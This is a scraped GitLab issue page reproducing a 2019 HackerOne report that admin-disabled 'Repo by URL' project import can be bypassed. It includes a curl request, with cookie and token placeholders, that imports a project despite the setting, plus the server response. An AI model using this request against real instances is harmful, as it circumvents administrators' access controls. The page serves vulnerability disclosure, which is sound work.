Skip to content
GitLab
Next
    • GitLab: the DevOps platform
    • Explore GitLab
    • Install GitLab
    • How GitLab compares
    • Get started
    • GitLab docs
    • GitLab Learn
  • Pricing
  • Talk to an expert
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
    Projects Groups Topics Snippets
  • Register
  • Sign in
  • GitLab GitLab
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributor statistics
    • Graph
    • Compare revisions
    • Locked files
  • Issues 54.9k
    • Issues 54.9k
    • List
    • Boards
    • Service Desk
    • Milestones
    • Iterations
    • Requirements
  • Merge requests 1.5k
    • Merge requests 1.5k
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Artifacts
    • Schedules
    • Test cases
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages and registries
    • Packages and registries
    • Package Registry
    • Container Registry
    • Terraform modules
    • Model experiments
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Code review
    • Insights
    • Issue
    • Repository
  • Snippets
    • Snippets
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • GitLab.orgGitLab.org
  • GitLabGitLab
  • Issues
  • #29748
Closed
Open
Issue created Jun 27, 2019 by GitLab SecurityBot@gitlab-securitybotReporter

ESCALATED: Bypass Disabled Repo by URL Project Creation

HackerOne report #630263 by ngalog on 2019-06-26, assigned to estrike:

Summary

As an admin, you can disable Repo by URL project creation in admin page https://:gitlab_instance/admin/application_settings

However the user can still import project using repo by url regardless of the setting

Steps to reproduce

  • As an admin, disable Repo by URL import source in /admin/application_settings/general under Visibility and access controls

image

  • As a regular user, run the following curl command:
curl 'http://gitlab.local/-/projects' \
    -H 'Content-Type: application/x-www-form-urlencoded' \
    -H "Cookie: $COOKIE" \
    --data-raw "utf8=%E2%9C%93&authenticity_token=$VALID_AUTHENTICITY_TOKEN&project%5Bimport_url%5D=https%3A%2F%2Fgitlab.com%2Fgitlab-org%2Frelease-cli.git&project%5Bimport_url_user%5D=&project%5Bimport_url_password%5D=&project%5Bci_cd_only%5D=false&project%5Bname%5D=Importing+Even+If+Disabled&project%5Bnamespace_id%5D=7&project%5Bpath%5D=importing-even-if-disabled&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0"

This command sends a request equivalent to what happens when using the Repo by URL import methods in the UI. It will import the gitlab-org/release-cli project by URL. In my case I got the response

<html><body>You are being <a href="http://gitlab.local/attacker/importing-even-if-disabled">redirected</a>.</body></html>

and the project was imported anyway.

Impact

Bypass project creation despite the admin setting explcitily disallow it

What is the current bug behavior?

Bypass project creation despite the admin setting explcitily disallow it

reproduced on gitlab CE 11.11.3 (gitlab-ce@e3eeb779d72006b9fbbaecf9f1d8fbd52a7d6383)

Impact

bypass project creation by repo by url

Edited Aug 04, 2021 by Dominic Couture
Assignee
Assign to
Time tracking